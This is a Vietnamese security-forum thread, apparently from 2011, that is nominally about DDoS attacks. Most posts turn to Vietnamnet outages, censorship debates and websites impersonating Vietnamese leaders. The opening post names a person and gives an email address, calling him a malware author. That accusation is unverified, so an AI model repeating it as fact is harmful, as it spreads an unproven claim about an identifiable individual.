@MoonFall : xin chào anh, cho dù thông tin đó là thực. một anh chàng Tuấn abc bờ cờ nào đó là STL thì bây giờ cũng chẳng quan trọng và mặc dù anh TQN ngay từ hồi đầu đã tóm được email và RC được cái socidemo@yahoo.com.au , rồi gmail rồi abc bờ cờ và biết chắc vị Tuấn này là tac giả tác phẩm một trong số virus malware . . . từ lâu rồi. nhưng KỆ he he he . thế mới hay. STL kô phải là một vị Tuấn nào đó, mà là một tổ chức cần được chúng ta ...bàn tiếp :P . chẳng ai chấp nhật vị Tuấn đấy là STL toàn bộ cả . thế thì mất vui lắm. phải có tổ chức, giáo phái đứng sau đầu tư, giật dây. phải có Trung quốc, phải có động cơ chính trị, phải có " thái tử " phải có công chúa. Phải có c15 , phải có anh TQN , có anh conmale , có anh PXMMF .v.v. phải có phải có tất cả . thế mới vui mà . tui Rfa.org này ..chưa forensic rồi. oài .

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Em chào các bác, có việc cần nhờ các bác giúp đỡ chút ạ Tình hình là em quản lý 1 con server windows 2003 có mấy ngày vừa rồi em ko vào theo dõi, hôm nay vào xem cái log Event Viewer phát hiện ra server của em liên tục bị tấn công từ xa vào tài khoản sa của sqlserver 2003, có 3 ngày mà nó cố tình log vào đến vài ngàn lần, may mày mấy bữa trước em cảnh giác đã disable tài khoản sa đi rồi, em quên mất ko đóng cổng sqlserver lại Mấy cái nơi chuyên request đến là các ip sau: 27.98.197.136; 111.68.10.26; 184.106.244.29; 208.43.153.125; 66.85.136.37 và tầm hơn chục ip khác, chúng đều cố tình log vào tài khoản sa của sqlserver thía là chúng nó đã bắt đầu uýnh em rùi, các bác có cách nào để bảo vệ an toàn ko chỉ e với, hiện tại em chỉ giám để mỗi cổng 80 hoạt động thôi, còn lại dùng firewall chặn hết các cổng khác, windows thì update thường xuyên

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

thuypv wrote:

Em chào các bác, có việc cần nhờ các bác giúp đỡ chút ạ Tình hình là em quản lý 1 con server windows 2003 có mấy ngày vừa rồi em ko vào theo dõi, hôm nay vào xem cái log Event Viewer phát hiện ra server của em liên tục bị tấn công từ xa vào tài khoản sa của sqlserver 2003, có 3 ngày mà nó cố tình log vào đến vài ngàn lần, may mày mấy bữa trước em cảnh giác đã disable tài khoản sa đi rồi, em quên mất ko đóng cổng sqlserver lại Mấy cái nơi chuyên request đến là các ip sau: 27.98.197.136; 111.68.10.26; 184.106.244.29; 208.43.153.125; 66.85.136.37 và tầm hơn chục ip khác, chúng đều cố tình log vào tài khoản sa của sqlserver thía là chúng nó đã bắt đầu uýnh em rùi, các bác có cách nào để bảo vệ an toàn ko chỉ e với, hiện tại em chỉ giám để mỗi cổng 80 hoạt động thôi, còn lại dùng firewall chặn hết các cổng khác, windows thì update thường xuyên

Bồ nên tạo một chủ đề khác. Cái này không nằm trong chủ đề đang thảo luận.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

songvedemdl wrote:

Em xin ngoài lề một tý: "Trong lĩnh vực cơ khí - tự động hóa, công trình "Dây chuyền sản xuất găng phẫu thuật y tế từ cao xu thiên nhiên" của KS Phạm Xuân Mai và cộng sự thuộc Công ty Cổ phần MERUFA đã đoạt Giải nhất. Đây là lần đầu tiên các nhà khoa học Việt Nam tự nghiên cứu, thiết kế, chế tạo và đưa vào sản xuất thành công dây chuyền tự động hóa, đồng bộ và hoàn chỉnh sản xuất găng mổ sử dụng nguyên liệu chính là cao su tự nhiên của Việt Nam, dây chuyền nói trên cho sản phẩm đoạt tiêu chuẩn quốc tế, giá rẻ hơn 30% so với giá găng nhập ngoại." nguồn http://environment-safety.com/news/data/2005_VIFOTEC.htm chúc anh PXMMRF thành công và có nhiều đóng góp hơn nữa cho xã hội ! hơn hẳn những người chỉ biết chỉ trích mà không (hoặc chưa) làm được gì thật sự có ích cho xã hội

Chúc mừng anh PXMMRF thì tốt nhưng việc chúc mừng này bị giảm mất ít nhiều giá trị vì lời chúc mừng không phải dành cho anh PXMMRF một cách trọn vẹn mà dùng nó để giải toả tự ái vì bị "chỉ trích". Nếu bồ phê bình những người chỉ biết chỉ trích mà không (hoặc chưa) làm gì thật sự có ích cho xã hội thì những kẻ chẳng những không làm gì có ích cho xã hội mà còn tàn phá xã hội, rút rỉa xã hội nhưng vẫn mang cái mớ lý thuyết ý thức hệ để chửi rủa và truyền đạt hành động chửi rủa từ thế hệ này sang thế hệ khác thì bồ nghĩ sao?

Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao — GMT

conmale wrote:

những kẻ chẳng những không làm gì có ích cho xã hội mà còn tàn phá xã hội, rút rỉa xã hội nhưng vẫn mang cái mớ lý thuyết ý thức hệ để chửi rủa và truyền đạt hành động chửi rủa từ thế hệ này sang thế hệ khác

Chuẩn không cần chỉnh. VN ta thì chỉ theo tiêu chí CCCO mà thôi, cho nên cũng không trách được(?). Ngay ở thị trấn tôi ở các con của chủ tịch, bí thư nói thật là đầu óc như quả nho, học hành không đâu vào đâu nhưng vẫn có chân trong bộ máy HC, thử hỏi những người này nắm trong bộ máy lãnh đạo thì thị trấn của tôi đi về đâu? Suy rộng ra( như lời Hồ Chủ Tịch đã nói) nước Việt ta sẽ đi về đâu? Đến lúc nào chúng ta mạnh dạn nhận sai lầm và chịu cải tổ( bắt đầu bằng tư duy), cải tổ hệ tư tưởng, cải tổ cái ý thức hệ thì mới mong Việt Nam phát triển sánh ngang với cường quốc năm châu như lời Bác Hồ đã dạy.

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

hình như vietnamnet bị DDoS tiếp rồi, mấy hôm trước mình vẫn vô bình thường còn hôm nay vô thì trắng bóc.

Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao — GMT

weasel1026789 wrote:

hình như vietnamnet bị DDoS tiếp rồi, mấy hôm trước mình vẫn vô bình thường còn hôm nay vô thì trắng bóc.

Hiện tại tôi vẫn đọc Vietnamnet bình thường. 16h02 PM GMT+7 14/09/2011

Phân tích tính chất vài trận DDoS HVA vừa qua.

docong1010 — GMT

Tôi không thể vào vietnamnet từ sáng tới giờ. Chắc bị DDOS nữa rồi

Phân tích tính chất vài trận DDoS HVA vừa qua.

cino — GMT

Chào các bác, thấy các bác ngoài lề em cũng mổ cò ngoài lề vài phát. Nếu cứ bị DDOS triền miên thì VNN mất khoảng bao lâu là tuyên bố "phá sản" được nhỉ? Không biết các BTV, KTV, CTV khi không tác nghiệp thì họ làm gì. O-) Chút tưởng tượng dọc theo 1 câu truyện trên topic này, Tại sao VNN *hay đá nhầm sân* (hay là *đi nhầm lề*) mà không bị tuýt còi trực tiếp (mà lại bị *dằn mặt* như hiện nay), giống như vụ tuýt còi bắt gỡ bài viết gì đó về sân bay ở ngoài hải đảo và bị phạt mấy chục triệu năm nao vậy. Có gì nhầm lẫn ở đây không?

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

Xác nhận 11h35 pm 14/09 Vietnamnet vào hơi chậm so với mọi hôm. " Có thể" đã tiếp tục bị DDos Theo mình biết : Trong thời gian qua VNN quả thật có một số bài viết khá gay gắt về vấn đề biển đông, TQ. Tuy nhiên nhưng bài viết kiểu như vậy xuất hiện khá nhiều tại các tờ báo mạng khác như Dantri, Vnexpres,... Vì vậy theo mình suy nghĩ tại vì VNN có những bài như vậy nên mới bị DDos là không hoàn toàn chính xác và hơn nữa gần đây số bài như vậy trên VNN khá ít nhưng VNN vấn bị DDos. Còn lý do vì sao thì có lẽ chính VNN mới là người hiểu nhất :D Mình cũng mới chỉ biết một vài thông tin sơ sơ ( Do mấy thằng bạn làm trong VNN nói trong lúc "phê phê "chưa xác thực nên chưa dám công bố :D ). Và việc các cq có thẩm quyền có tới làm việc với VNN để giải quyết vấn đề trên không thì chúng ta( những người không làm ở VNN) không hề biết chính xác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

nowhereman wrote:

@TMDTH : tại hạ không biết nên đã thất lễ với tiền bối. mong rằng tiền bối lượng thứ nếu tại hạ có viết ý gì gây khó chịu. tại hạ xin trân trọng những ý kiến góp ý của tiền bối ạ. tại hạ xin cố gắng sửa, và điều chỉnh chính tả để tiếng việt mình thêm đẹp hơn và đúng nữa . > tiền bối đang nghiên cứu để lập trình một " tool hỗ trợ phân tích sóng gây nhiễu radar ? vậy tiền bối có thể cho tại hạ biết " quá trình đi ngược " của tiền bối về các loại sóng gây nhiễu ? các loại sóng ảnh hướng tối sóng rada ? và nguồn nó ở đâu chưa? . rùi biết đâu anh em HVA lại giúp anh lập trình ok mà . chúc anh thành công .

Chân thành cảm ơn HVA member, khi nào khó khăn mình sẽ nhờ lòng yêu dân tộc của bạn. Hiện giờ cho mình sorry nhé, "bí mật không thể bật mí" :D !!! PS: cảm ơn HVA member đã khơi dậy lòng tự hào của dân tộc Việt Nam. Việc các anh làm rất có ý nghĩa trong hoàn cảnh này. Trân trọng và Chúc sức khoẻ HVA member. " đâm mấy thằng gian bút chẳng tà".

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

cino wrote:

Chào các bác, thấy các bác ngoài lề em cũng mổ cò ngoài lề vài phát. Nếu cứ bị DDOS triền miên thì VNN mất khoảng bao lâu là tuyên bố "phá sản" được nhỉ? Không biết các BTV, KTV, CTV khi không tác nghiệp thì họ làm gì. O-) Chút tưởng tượng dọc theo 1 câu truyện trên topic này, Tại sao VNN *hay đá nhầm sân* (hay là *đi nhầm lề*) mà không bị tuýt còi trực tiếp (mà lại bị *dằn mặt* như hiện nay), giống như vụ tuýt còi bắt gỡ bài viết gì đó về sân bay ở ngoài hải đảo và bị phạt mấy chục triệu năm nao vậy. Có gì nhầm lẫn ở đây không?

Đối với một xã hội trong đó có đa số những người có khả năng tư duy, phân tích, đánh giá và nhận định vấn đề một cách chính xác và trung thực (chớ chẳng phải được "định hướng" như một lũ học sinh nhỏ) thì việc "đá nhầm sân" hay "đi nhầm lề" không tồn tại bởi vì chẳng có cái gì gọi là "sân" và "lề" đối với những con người biết đánh giá vấn đề trong đúng khuôn khổ (context) và hoàn cảnh bằng chính tư duy của mình. Một xã hội khoẻ mạnh là một xã hội luôn luôn có những ý kiến trái chiều và những quan điểm đối nghịch nhau để làm đối trọng và gìn giữ sự cân bằng. Cho dù một tờ báo hay một cá nhân nào đó nói gì "trật lề" bởi vì tờ báo ấy và cá nhân ấy sống trong một xã hội mà mỗi sự việc đều cần được "theo lề" đi chăng nữa, chuyện đúng hay sai, giá trị hay vô giá trị ...v...v.... là để cho xã hội tự đánh giá và tự loại bỏ chớ chẳng phải để cho một nhúm người nào đó tự "đại diện", tự đánh giá thay cho cả xã hội và dùng một dạng sức mạnh nào đó để loại bỏ những gì nằm bên ngoài những thứ họ áp đặt. Đã hết thập niên thứ nhất của thế kỷ 21, thế kỷ của "thông tin", của trí tuệ, của "thế giới phẳng", của sự mở rộng gần như không giới hạn của tri thức và trí thức...v...v... vậy mà vẫn có những con người hành xử và vẫn có những con người chấp nhận được hành xử như thời phong kiến đầy hủ lậu. Thời xưa, có vô số những điều gọi là "phạm huý" (đung chạm nhà vua) nên cấm kỵ và hễ ai nói ra thì mang vạ vào thân. Ngày nay không có vua và "mọi người đều bình đẳng" nhưng vẫn có muôn vàn cái "huý" và hễ ai nói ra cũng mang vạ vào thân chẳng khác gì ngày xưa. Ngày xưa, "thánh chỉ" ban xuống thì chỉ có cúi đầu phủ phục mà tuân theo chớ chẳng bao giờ dám hé môi cho dù "thánh chỉ" có phi lý, vô đạo đến mức nào đi chăng nữa. Ngày nay, không có "thánh chỉ" nữa nhưng những con người của ngày nay vẫn "phủ phục" ở một tư thế khác. Đánh đổ làm chi cái chữ "phong kiến" trong khi tư duy của những con dân "phong kiến" vẫn đầy ăm ắp không khác gì ngày xưa? Vietnamnet "đi nhầm lề" là do chính bản thân mình nhận thấy như thế và cái "lề" nào đó là do chính mình đặt ra theo tiêu chuẩn và nhận định của cá nhân mình hay là do những ai đó "định hướng" giúp mình và "cái lề" nào đó là do họ (những ai đó) đặt ra?

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

ĐẦY DẪY WEBSITE MẠO DANH CÁ NHÂN VÀ TỔ CHỨC TRÊN MẠNG Gần đây trên mạng xuất hiện và đầy dẫy các website mạo danh cá nhân. Hầu hết các nhà lãnh đạo Việt nam và các yếu nhân đều có website mao danh. Thống kê chưa đầy đủ có tới trên dưới 200 tên miền trỏ đến các website mạo danh cá nhân. Website mao danh cá nhân được hosting tai nhiều webserver và các webserver này hầu hết hay tất cả là các dedicated server (server thuê riêng) có IP tĩnh riêng, được thiết lập chỉ để hosting website mao danh. (Mỗi cá nhân có 1 website mạo danh và mỗi website mạo danh có một webserver riêng). Chi phí cho "dịch vụ này" quả là rất lớn và tốn rất nhiều nhân lực! Các bạn tham khảo báo Tuổi trẻ điện tử, tai đây: http://nhipsongso.tuoitre.vn/Nhip-song-so/455316/Tran-lan-web-mao-danh-lanh-dao.html Hôm nay trang web báo Cantho online Cơ quan của Đảng bộ TP Cần thơ, link tai: http://baocantho.com.vn cũng bị giả mạo. Website giả mạo tại có domain là http://baocantho.net/ Bài phân tích sự kiện giả mạo website Cần thơ tại đây: http://vov.vn/Home/Phat-hien-vu-lam-gia-bao-dien-tu-Can-Tho/20119/185965.vov Cách đây vài hôm tôi cũng đã thông báo cho các bạn hiện tượng này và kẻm ý kiến cá nhân (chỉ là ý kiến cá nhân). Nhưng hình như không có ai quan tâm nghiên cứu và bình luận:

Nhân đây tôi "bật mí" cho các bạn một thông tin. Trong bài viết đánh giá về tổ chức của STL (bao gồm chính bản thân STL và bộ phận lãnh đạo, hướng dẫn nó) trong topic này tôi có viết một câu:
PXMMRF ngay17/08/2011 luc 15:44:12 wrote:

Nếu ai đó nói về một vài công việc khác mà có thể STL đang làm, chúng ta có thể phải kinh ngạc về khôi lương công việc họ phải làm và thán phục về ý tưởng sâu xa, thâm hiểm của họ.
Bai viết tại: /hvaonline/posts/list/450/39641.html#245191 Thì nay xin tiết lộ, câu viết trên đây ám chỉ sự kiện sau: http://nhipsongso.tuoitre.vn/Nhip-song-so/455316/Tran-lan-web-mao-danh-lanh-dao.html Vào thời gian viết bài nói trên, tôi đã biết sư kiện này và đang tìm hiểu nó. Vì chưa tìm hiểu kỹ nên chưa thể thông báo. Nay báo NLĐ và Tuổi trẻ online đã thông báo sự kiện, nên không còn gì là bí mật nữa. Tuy nhiên thực tế nghiêm trong và kinh hãi hơn thông tin trên báo nhiều.

---------------------------------------------------- Theo các bạn hiện tương trên có được coi là nghiêm trọng hay không? Tại sao lại coi như vậy? Và theo các bạn, ai đứng sau hành vi này? Xin ý kiến bình luận của các bạn

Phân tích tính chất vài trận DDoS HVA vừa qua.

Rolex0210 — GMT

Bài post cách đây vài hôm của a thì e có xem qua, nhưng không bình luận gì :) Hôm nay a đặt câu hỏi thì cũng mạo muội trả lời theo suy nghĩ riêng e. Câu thứ nhất: Theo các bạn hiện tương trên có được coi là nghiêm trọng hay không? Tại sao lại coi như vậy? - Hiện tượng trên e cho là quá nghiêm trọng! Bởi lẽ điều gì liên quan đến chính trị đều như vậy, nó ảnh hưởng tới 1 tập thể, tổ chức và lớn hơn nữa là tầm quốc gia. Người dân không hay biết rằng đó là website mạo danh, từ đó tin vào những bài viết ( không biết tác giả là ai ) và dẫn đến có ( hay không ) những ý kiến trái chiều sau khi tiếp thu. Xuyên tạc kiểu này thoạt nhìn rất đơn giản nhưng tầm hoạt động không hề nhỏ chút nào. Hầu hết ai ai cũng tiếp xúc vs máy tính và việc truy cập vào mạng để xem thông tin là rất dễ dàng. Từ những thông tin đó, "họ" vịn vào để làm bàn đạp cho những âm mưu, diễn biến hoà bình... Và làm như "vô tình" có cớ để thực hiện. Còn người dân thì hoang mang không biết tin vào ai :) Câu thứ hai: Và theo các bạn, ai đứng sau hành vi này? - Hj, dám cá ai đọc xong câu này thì ngay lập tức trong đầu sẽ nghĩ ngay đến "bọn đó" dù ít hay nhiều ^^ Thật ra dù là ai thì vs âm mưu thâm hiểm như vậy, chắc chắn có thể gọi "họ" là những người không hài lòng vs hệ thống NN hiện tại, hoặc kẻ thù địch bên ngoài nước muốn gây rối, triệt hạ dần quốc gia VN. Và tất nhiên, những kẻ trực tiếp làm ra chuyện này đều là những người có đầu óc và khả năng phân tích tốt. Bởi lẽ hệ thống nhận thức càng cao thì đi kèm cùng đó là phát hiện ra những kẽ hở để mà khắc phục ( triệt hạ ). Nhưng sự khắc phục ( triệt hạ ) đó dựa trên quan điểm như thế nào, mang lại lợi ích cho ai thì còn bỏ ngõ..

Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok — GMT

Ý kiến của mình về bài trên của bác PX : - Giả các trang web của lãnh đạo gây hại rất ít, vì những người đã lên web đọc thì cũng hiểu là các lãnh đạo chả ông nào làm trang web riêng cả. Vì khả năng của ông lãnh đạo, vì tâm không có. Vì thế, đọc là biết giả liền - Các trang web giả khác thì nguy hại khi người đọc đã bị "định hướng" từ nhỏ ( như anh Conmale đã viết), không có khả năng tư duy để phân biệt mà chỉ biết tiếp nhận thông tin một chiều. Cái nguy hại nhất ở đây là xã hội VN hiện nay, người dân luôn tiếp nhận thông tin được áp đặt vì vậy mới tạo điều kiện cho cái xấu hoành hành. Bạn Rolex viết âm mưu, diễn biến hoà bình mà mình hãi quá. Chẳng hiểu diễn biến hoà bình là gì?!!!

Phân tích tính chất vài trận DDoS HVA vừa qua.

mrviet — GMT

Sherlockok wrote:

Ý kiến của mình về bài trên của bác PX : - Giả các trang web của lãnh đạo gây hại rất ít, vì những người đã lên web đọc thì cũng hiểu là các lãnh đạo chả ông nào làm trang web riêng cả. Vì khả năng của ông lãnh đạo, vì tâm không có. Vì thế, đọc là biết giả liền - Các trang web giả khác thì nguy hại khi người đọc đã bị "định hướng" từ nhỏ ( như anh Conmale đã viết), không có khả năng tư duy để phân biệt mà chỉ biết tiếp nhận thông tin một chiều. Cái nguy hại nhất ở đây là xã hội VN hiện nay, người dân luôn tiếp nhận thông tin được áp đặt vì vậy mới tạo điều kiện cho cái xấu hoành hành. Bạn Rolex viết âm mưu, diễn biến hoà bình mà mình hãi quá. Chẳng hiểu diễn biến hoà bình là gì?!!!

Bạn viết như thế này không có chút thuyết phục nào cả.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok — GMT

mrviet wrote:

Sherlockok wrote:

Ý kiến của mình về bài trên của bác PX : - Giả các trang web của lãnh đạo gây hại rất ít, vì những người đã lên web đọc thì cũng hiểu là các lãnh đạo chả ông nào làm trang web riêng cả. Vì khả năng của ông lãnh đạo, vì tâm không có. Vì thế, đọc là biết giả liền - Các trang web giả khác thì nguy hại khi người đọc đã bị "định hướng" từ nhỏ ( như anh Conmale đã viết), không có khả năng tư duy để phân biệt mà chỉ biết tiếp nhận thông tin một chiều. Cái nguy hại nhất ở đây là xã hội VN hiện nay, người dân luôn tiếp nhận thông tin được áp đặt vì vậy mới tạo điều kiện cho cái xấu hoành hành. Bạn Rolex viết âm mưu, diễn biến hoà bình mà mình hãi quá. Chẳng hiểu diễn biến hoà bình là gì?!!!
Bạn viết như thế này không có chút thuyết phục nào cả.

Bạn vui lòng cho biết, không thuyết phục ở chỗ nào ? Chứ nói khơi khơi thì .... =)) =)) :-(

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

Sherlockok wrote:

Ý kiến của mình về bài trên của bác PX : - Giả các trang web của lãnh đạo gây hại rất ít, vì những người đã lên web đọc thì cũng hiểu là các lãnh đạo chả ông nào làm trang web riêng cả. Vì khả năng của ông lãnh đạo, vì tâm không có. Vì thế, đọc là biết giả liền

"những người đã lên web đọc thì cũng hiểu các nhà lãnh đạo chả ông nào làm trang web riêng cả" ? Nếu những thông tin đó a PXMMRF không đưa lên thì mình tin chắc sẽ có rất nhiều người ( như mình chẳng hạn) lên đọc và tin những điều trên web đó nói. Vì ban đầu thông tin trên đó đều là những thông tin chính xác, nhưng sau đó...Và việc một nhà lãnh đạo có trang web riêng thì cũng khá bình thường thôi bạn. Và nếu ai cũng có khả năng phân tích vấn đề, cẩn thận như vậy thì chắc nạn vr, worm,... đã không hoành hành ghê gớm đến vậy "Vì khả năng của ông lãnh đạo, vì tâm không có" : Câu này mình thực sự không hiểu. Chẳng lẽ trong rất nhiều lãnh đạo lại không có ai có khả năng làm nổi một trang web( bạn hơi bị coi thường người khác rồi), họ không làm vì không có thời gian thôi và hơn nữa những việc đó đã có bộ phận khác làm và thường xuyên up lên đó những thông tin liên quan đến vị lãnh đạo đó lên cho họ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Trên kia là sự kiện: ĐẦY DẪY WEBSITE MẠO DANH CÁ NHÂN VÀ TỔ CHỨC TRÊN MẠNG Còn hôm qua 15/9/2011 là sự kiện "mạo danh" khác: Cướp thương hiệu Việt ở nước ngoài và toan tính sâu xa Hôm qua vietnamnet.vn (tai Diễn đàn kinh tế Việt nam, http://vef.vn) có đăng tải bài viết trên. Tuy nhiên việc truy câp đến vietnamnet.vn thường khá khó khăn, ngay cả khi truy cập trực tiếp vào đia chỉ http://vef.vn. Nhiều website khác đã sao chép nguyên văn lai bài viết. Vì vậy để xem nôi dung bài viết, các ban nên truy câp vào các website này.

Cướp thương hiệu Việt ở nước ngoài và toan tính sâu xa Thứ Năm, 15/09/2011 | 06:15 http://vietstock.vn/ChannelID/768/Tin-tuc/201003-cuop-thuong-hieu-viet-o-nuoc-ngoai-va-toan-tinh-sau-xa.aspx Những vụ "cướp" thương hiệu Việt trên thị trường thế giới có thể do đối tác không tin tưởng vào thiện chí làm ăn hay đón đầu để ép DN Việt mua lại thương hiệu. Không loại trừ khả năng lôi kéo vào các vụ kiện tụng kéo dài, tốn kém, làm suy yếu khả năng cạnh tranh của và chặn đường phát triển của các sản phẩm VN. Cách đây vài ngày, một hãng luật quốc tế có trụ sở ở Việt Nam vừa phát hiện ra hai nhãn hiệu "Cà phê Buôn Ma Thuột" và "Buôn Ma Thuột cà phê 1896" đều được công ty TNHH cà phê Quảng Châu - Buôn Ma Thuột bảo hộ trong thời hạn 10 năm. Nghĩa là, trong 10 năm tới, các DN cà phê mang chỉ dẫn địa lý Buôn Ma Thuột của Việt Nam có thể sẽ bị ngăn chặn nếu xuất khẩu vào Trung Quốc. Mất thương hiệu đồng nghĩa với việc mất thị trường. ............................... .............................. Nếu tài sản hữu hình được xem là phần "xác" thì nhãn hiệu được ví như "linh hồn" của doanh nghiệp. Một doanh nghiệp mà phần hồn bị đánh mất thì khác nào một thực thể vô tri, không có sức cạnh tranh, sức hấp dẫn, có nguy cơ bị thâu tóm và lệ thuộc. Khi mất quyền sở hữu nhãn hiệu, doanh nghiệp không chỉ mất thị trường, hàng thật biến thành hàng giả vì nhãn hiệu của mình đã được bảo hộ bởi một đơn vị khác, ... mà còn ảnh hưởng lâu dài tới uy tín, sức cạnh tranh và nhiều hệ lụy khác lâu dài. Nếu muốn phát triển cơ hội kinh doanh ở các thị trường này thì doanh nghiệp Việt Nam thường phải đối diện với những vụ kiện tụng tốn kém kéo dài hoặc phải tốn tiền mua lại quyền sở hữu nhãn hiệu vốn là của mình. ....................................... Trần Minh Quân Diễn đàn kinh tế Việt Nam (Vietnamnet)

----------------------------------------- Comment: - Tôi không đồng ý lắm với cách dùng từ "Cướp" của bài viết trên Vietnamnet Vì thưc ra khi đăng ký các nhãn hiệu cà phê BMT, doanh nghiệp TQ đã làm theo đúng luật của TQ và luật quốc tế trong việc Đăng ký bảo hộ nhãn hiệu hàng hoá. Chỉ có điều đây rõ ràng là một hành đông không đẹp chút nào hay được coi là xấu chơi, đăc biệt trong bối cảnh quan hệ VN-TQ luôn được tuyên bố là "vừa là đồng chí-vừa là anh em", hay "4 tốt", "16 chữ vàng"... - Quay trở lai sự kiện "Website mạo danh cá nhân, tổ chức" nói trên, xin các bạn trao đổi thêm cho sáng ý là: Hành đông mao danh website cá nhân, tổ chức như vậy có phù hơp với luật pháp VN, luật pháp Mỹ (vì hâu hết webserver hosting các website mạo danh đặt tai Mỹ) và luật quốc tế hay không? Và tai sao lại như vây?. -

Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok — GMT

mylove14129 wrote:

Sherlockok wrote:

Ý kiến của mình về bài trên của bác PX : - Giả các trang web của lãnh đạo gây hại rất ít, vì những người đã lên web đọc thì cũng hiểu là các lãnh đạo chả ông nào làm trang web riêng cả. Vì khả năng của ông lãnh đạo, vì tâm không có. Vì thế, đọc là biết giả liền
"những người đã lên web đọc thì cũng hiểu các nhà lãnh đạo chả ông nào làm trang web riêng cả" ? Nếu những thông tin đó a PXMMRF không đưa lên thì mình tin chắc sẽ có rất nhiều người ( như mình chẳng hạn) lên đọc và tin những điều trên web đó nói. Vì ban đầu thông tin trên đó đều là những thông tin chính xác, nhưng sau đó...Và việc một nhà lãnh đạo có trang web riêng thì cũng khá bình thường thôi bạn. Và nếu ai cũng có khả năng phân tích vấn đề, cẩn thận như vậy thì chắc nạn vr, worm,... đã không hoành hành ghê gớm đến vậy "Vì khả năng của ông lãnh đạo, vì tâm không có" : Câu này mình thực sự không hiểu. Chẳng lẽ trong rất nhiều lãnh đạo lại không có ai có khả năng làm nổi một trang web( bạn hơi bị coi thường người khác rồi), họ không làm vì không có thời gian thôi và hơn nữa những việc đó đã có bộ phận khác làm và thường xuyên up lên đó những thông tin liên quan đến vị lãnh đạo đó lên cho họ.

Ý mình ở đây không phải là khả năng về tin học của người đọc thông tin trên internet, mà là ý thức khi tiếp nhận thông tin. Rộng hơn là do cách giáo dục mang tính áp đặt, thông tin trong xã hội cũng là một chiều. Chính vì vậy đa số mọi người ít khi tư duy, phân tích thông tin mình nhận được. Tất nhiên các ông lãnh đạo không ai làm trang web về mặt kĩ thuật, mà là chịu trách nhiệm về thông tin trên trang web riêng của các ông ấy. Mình không coi thường ai cả, mình chỉ nói thực tế ở VN hiện nay thôi, mình chưa thấy ông lãnh đạo nào ở VN có trang web hay blog riêng cả. Các vị thủ tướng nổi tiếng thế giới vẫn có blog, web... nên không thể nói bận về thời gian. Mình chỉ không tin ở VN, có ông nào đủ khả năng dám trao đổi thông tin trên trang web riêng với người dân thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

docong1010 — GMT

Tôi đồng ý với bạn Sherlockok thử hỏi lãnh đạo của mình có dám ra chất vấn với dân chưa những vấn đề nóng hay ai cũng lãng tránh trách nhiệm. Thật sự không thể hiểu nổi cái đất nước ViệtNam mình sẽ đi về đâu? Với sự giả mạo các trang Web lãnh đạo , mình nghĩ những người đứng sau là một tổ chức rất có quy mô họ sẳn sàng bỏ ra cả núi tiền để làm như vậy. Mục đích là nhắm vào những người hay quan tâm đến chính trị và nếu có nhưng thông tin sai lệch từ các trang web, họ là người bị ảnh hưởng đầu tiên nếu họ không kiểm chứng các thông tin trên còn ảnh hưởng gì lúc xảy ra mới biết :D . Tôi cũng nghỉ các vị lảnh đạo nên có 1 trang web hay một blog từ đó thể nghe thông tin đa chiều của dân và lâu lâu đăng một bài viết của chính mình hii( Điều đó khó xảy ra)

Phân tích tính chất vài trận DDoS HVA vừa qua.

cino — GMT

conmale wrote:

cino wrote:

Chào các bác, thấy các bác ngoài lề em cũng mổ cò ngoài lề vài phát. Nếu cứ bị DDOS triền miên thì VNN mất khoảng bao lâu là tuyên bố "phá sản" được nhỉ? Không biết các BTV, KTV, CTV khi không tác nghiệp thì họ làm gì. O-) Chút tưởng tượng dọc theo 1 câu truyện trên topic này, Tại sao VNN *hay đá nhầm sân* (hay là *đi nhầm lề*) mà không bị tuýt còi trực tiếp (mà lại bị *dằn mặt* như hiện nay), giống như vụ tuýt còi bắt gỡ bài viết gì đó về sân bay ở ngoài hải đảo và bị phạt mấy chục triệu năm nao vậy. Có gì nhầm lẫn ở đây không?
Đối với một xã hội trong đó có đa số những người có khả năng tư duy, phân tích, đánh giá và nhận định vấn đề một cách chính xác và trung thực (chớ chẳng phải được "định hướng" như một lũ học sinh nhỏ) thì việc "đá nhầm sân" hay "đi nhầm lề" không tồn tại bởi vì chẳng có cái gì gọi là "sân" và "lề" đối với những con người biết đánh giá vấn đề trong đúng khuôn khổ (context) và hoàn cảnh bằng chính tư duy của mình.

Chào bác, theo em cái xã hội tự do và tự chủ không giới hạn lề lối đó nó nằm trong "giấc mơ" của Lê Nin mà thôi. Mọi xã hội luôn có những "lề lối" của nó. (nghĩa hiểu theo khía cạnh chính trị). Chẳng hạn bao nhiêu nước tự do, dân chủ; mà sau khi WikiLeaks của Julian Assange quyết định phá vỡ cái "lề" ấy đi thì bấy nhiêu con người (là chủ của một xã hội) phải gầm rú và nhất quyết "xử" bằng mọi giá (xúi amazon, paypal... kicks off). Mọi xã hội, hay một thế giới chẳng có cái gì mở toang theo hướng một chiều hết, mọi thứ đều có ít nhiều những đối trọng tạo nên một cái "lề", cái "lề" chính trị. Bao giờ không còn từ ngữ "đàn áp chính trị" thì mới chẳng có cái *chẳng có cái gì gọi là "sân" và "lề"* như bác nói. Và cái gọi là "lề" hay không có "lề" cũng tuỳ vào không gian/ hoàn cảnh của người nói. Đối với người làm chủ thì cái "lề" ấy chính là toàn bộ quốc gia, còn đối với người "chống đối" cái lề mà chính họ đang theo là "lề phải" trong khi những người đi theo người chủ thì lại coi đó là "lề trái". * Về các website mạo danh, em nghĩ đó là chiêu thức tung tin "phản động" ("phản động" hiểu theo nghĩa những mà người đang theo chính quyền CS đang nghĩ) và dựa vào nó để tạo niềm tin cho đa số nhân dân (nông dân). Vì họ vốn có niềm tin vào Đảng, vốn dễ choáng ngợp khi thấy cái website hoành tráng, ấn tượng lại treo 